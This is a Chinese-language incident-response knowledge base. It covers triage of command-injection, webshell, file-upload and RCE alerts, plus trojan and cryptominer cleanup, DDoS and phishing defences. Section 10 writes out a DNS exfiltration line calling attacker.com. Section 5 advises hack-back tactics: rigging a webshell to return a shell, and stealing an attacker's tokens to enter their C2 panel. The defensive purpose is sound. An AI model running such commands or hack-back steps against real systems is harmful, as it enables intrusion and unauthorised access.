网络安全应急响应知识库


网络安全应急响应知识库

一、命令注入攻击确认方法

在监测平台发现命令注入告警后,应按以下步骤确认是否为真实恶意攻击:

  1. 排除业务白名单:先查询是否为正常业务行为。
  2. 查看攻击 payload 特征:如包含 ;&|`$(...) 等命令拼接符号。
  3. 分析请求上下文:User-Agent、Referer、Cookie 是否异常;是否来自已知扫描器或恶意 IP。
  4. 系统行为关联:检查服务器日志、进程、网络连接是否有异常外联或执行行为。
  5. 业务场景合理性:输入字段是否本不该包含命令字符(如用户名、订单号等)。

五元组信息:源IP(SIP)、源端口(SPORT)、目的IP(DIP)、目的端口(DPORT)、传输层协议(TCP/UDP)——用于追踪攻击路径。

二、中了木马病毒的应急处置流程

  1. 立即隔离:断网、禁用网卡或通过防火墙阻断外连,防止横向扩散。
  2. 确定攻击范围:排查内网其他主机,检查 Web 日志、进程(ps auxf)、网络连接(netstat -antp)、SSH 登录记录等。
  3. 保留样本并溯源:保存恶意文件、流量包,分析攻击入口,对攻击者 IP 进行反制或上报。
  4. 恢复与加固:清理后门、清除持久化项(crontab、systemd、.bashrc 等),必要时重装系统。
  5. 凭证与策略更新:修改所有相关密码,升级组件,强化密码策略和访问控制。

三、判断 Webshell 连接是否为真实攻击

  • 连接来源可信? 若来自运维 IP 或白名单,可能是误报。
  • 行为是否正常? 连接频率、目标路径是否符合业务逻辑。
  • 存在可疑文件? 检查服务器是否存在未知的 .php/.jsp/.asp 等可执行脚本。
  • 🔍 日志分析:访问日志中是否有高频请求、敏感路径访问、编码参数等可疑行为。

四、挖矿病毒排查与处置

排查方法:

  • CPU 占用高 → 使用 top(Linux)或任务管理器(Windows)定位异常进程。
  • 网络外连 → 使用 netstat -anp 或 Wireshark 查看是否连接矿池(如 xmrpool、minexmr 等)。
  • 异常进程 → 检查 ps aux/proc/PID 目录,定位可执行文件路径。
  • 文件扫描 → 使用杀毒工具或 YARA 规则扫描可疑二进制文件。

处置流程:

  1. 确定挖矿开始时间(通过日志或进程创建时间)。
  2. 根据时间点回溯:检查计划任务、启动项、可疑用户。
  3. 备份样本并上传至沙箱(如 ANY.RUN、VirusTotal)分析行为。
  4. 彻底清除:删除进程、文件、计划任务、systemd 服务等。
  5. 修复漏洞、加固系统、更新补丁。

五、通过 Webshell 反制攻击者

  • 文件溯源:查看 Webshell 的创建/修改时间,结合 FTP/SSH 日志定位攻击者 IP。
  • 特征匹配:提取加密方式、密码硬编码(如蚁剑默认 pass 参数),比对公开样本库。
  • 反向渗透:修改 Webshell,在攻击者连接时反弹 shell 到蜜罐服务器。
  • 会话劫持:窃取其 Cookie/Token,模拟登录 C2 控制面板进行反侦察。

六、DDoS 攻击防护措施

  • 增加带宽冗余
  • 部署防火墙(如云 WAF、硬件防火墙)
  • 启用 IDS/IPS 实时检测异常流量
  • 配置速率限制(Rate Limiting)
  • 使用 CDN 或 DDoS 高防服务(如阿里云 Anti-DDoS)

七、内网横向移动常见手法

  • Pass-the-Hash(PTH):利用 NTLM 哈希传递认证
  • SMB 弱口令爆破(445 端口)
  • 利用“永恒之蓝”等 RCE 漏洞
  • 钓鱼邮件投递木马(伪装成内部通知)

八、防范钓鱼邮件

  • 部署邮件网关,启用 SPF/DKIM/DMARC 验证
  • 定期开展员工安全意识培训
  • 附件沙箱动态分析(如 Cuckoo Sandbox)
  • Office 宏默认禁用,仅允许可信来源启用

九、文件上传行为研判

判断是否为恶意告警:

  • 文件名可疑:含 .php/.jsp、双重扩展名(test.jpg.php)、路径穿越(../)、%00 截断
  • 内容异常:文件头与扩展名不符、含一句话木马、超大文件
  • HTTP 请求异常:Content-Type 声称是 image,实际传 PHP;时间戳异常

判断是否上传成功:

  • 响应包是否返回文件路径?
  • 能否直接访问上传的文件并触发执行?
  • 服务器是否有外联行为(如 curl 下载 payload)?
  • 检查 Web 日志:状态码 200 + 后续访问记录

十、无回显命令执行(RCE)确认方法

  • 时间延迟:观察响应是否因 sleep 10 明显变慢
  • DNS 外带:攻击者构造 ping \`whoami\`.attacker.com,通过 DNS 日志确认
  • HTTP 外带:服务器向攻击者控制的 Web 服务器发起请求
  • 临时文件写入:检查 /tmp、/dev/shm 是否有新文件
  • 系统日志监控:auditd、syslog 中是否记录可疑命令

十一、远程代码执行(RCE)告警研判

  • 上下文分析:源 IP 是否恶意?目标是否存在已知漏洞?
  • 协议异常:HTTP 中含系统命令、SQL 注入中嵌套 OS 命令
  • 特征模式:大量使用 |>、Base64 编码、反序列化含危险类
  • 会话行为:短时多会话、探测命令、下载 nc/reverse shell
  • 资产关联:是否为互联网暴露面?是否含敏感数据?

处置流程:

  1. 初步隔离:断网、封 IP、保存日志
  2. 全面排查:分析攻击链、检查横向移动、持久化后门
  3. 修复加固:打补丁、重置凭证、最小权限原则